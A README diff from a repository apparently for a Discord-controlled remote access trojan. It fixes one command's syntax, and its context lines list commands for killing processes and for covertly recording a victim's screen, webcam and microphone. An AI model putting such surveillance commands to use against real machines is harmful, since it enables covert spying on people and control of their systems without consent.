moom825/Discord-RAT/README.md

 --> !displaydir = display all items in current dir
 --> !currentdir = display the current dir
 --> !dateandtime = display system date and time
---> !prockill = kill a process by name / syntax = "!kill process.exe"
+--> !prockill = kill a process by name / syntax = "!prockill process.exe"
 --> !recscreen = record screen for certain amount of time / syntax = "!recscreen 10"
 --> !reccam = record camera for certain amount of time / syntax = "!reccam 10"
 --> !recaudio = record audio for certain amount of time / syntax = "!recaudio 10"